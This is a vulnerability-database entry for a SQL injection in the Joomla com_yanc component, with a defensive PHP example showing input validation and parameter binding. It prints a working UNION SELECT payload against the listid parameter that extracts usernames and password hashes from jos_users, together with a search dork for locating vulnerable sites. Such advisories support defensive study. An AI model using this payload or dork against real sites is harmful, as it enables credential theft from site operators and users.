Vendor: com_yanc
By: Snakespc
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: com_yanc
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla com_yanc Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable Joomla application. The request carries SQL statements in the listid parameter that can be used to extract sensitive information from the database, such as usernames and passwords. The proof-of-concept request published for this vulnerability is: http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
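
The mitigation above, applied to a numeric request parameter such as listid, as an added PHP example (not com_yanc's own code). The lists table, build_query_unsafe() and find_list() are hypothetical names, and an in-memory SQLite database stands in for Joomla's MySQL database.

```php
<?php
// Added example. Table `lists` and its columns are constructed for
// illustration; they are not com_yanc's real schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE lists (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO lists VALUES (1, 'Newsletter')");

// Weak pattern: the request value becomes part of the SQL text itself.
function build_query_unsafe(string $listid): string
{
    return "SELECT name, id FROM lists WHERE id = $listid";
}

// Hardened pattern: validate as a positive integer, then bind it.
function find_list(PDO $db, string $listid): array
{
    $id = filter_var($listid, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // not a positive integer: the value never reaches SQL
    }
    $stmt = $db->prepare('SELECT name, id FROM lists WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// listid as PHP decodes it from the URL on this page ('+' becomes a space).
$fromPage = '-2 UNION SELECT concat(username,0x3a,password),2 from jos_users--';

// The concatenated statement now contains a second SELECT chosen by the client.
echo build_query_unsafe($fromPage), PHP_EOL;

// The hardened handler accepts a plain integer and rejects everything else.
var_dump(find_list($db, '1'));
var_dump(find_list($db, $fromPage));
var_dump(find_list($db, '1 OR 1=1'));
```

Validation and binding are layered deliberately: the integer check rejects malformed input early, and the bound parameter keeps the value out of the SQL text even if the check is later loosened.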

Exploit-DB raw data:

==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork:     [inurl:index.php?option=com_yanc "listid" ]   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################